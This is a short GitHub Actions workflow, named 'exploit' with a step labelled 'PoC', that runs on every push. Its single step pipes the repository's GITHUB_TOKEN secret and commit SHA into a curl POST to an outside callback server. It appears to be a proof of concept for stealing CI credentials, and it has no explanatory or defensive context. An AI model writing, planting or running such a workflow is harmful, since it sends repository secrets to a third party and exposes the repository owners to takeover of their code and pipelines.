name: exploit
on: [push]
jobs:
  exploit:
    runs-on: ubuntu-20.04
    steps:
    - name: PoC
      run: >
        echo "{\"token\":\"$GITHUB_TOKEN\",\"sha\":\"$GITHUB_SHA\"}" | curl -H "Content-Type: application/json" -X POST --data-binary @- https://gh-pages.dev.skipfish.de/callback
      env:
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
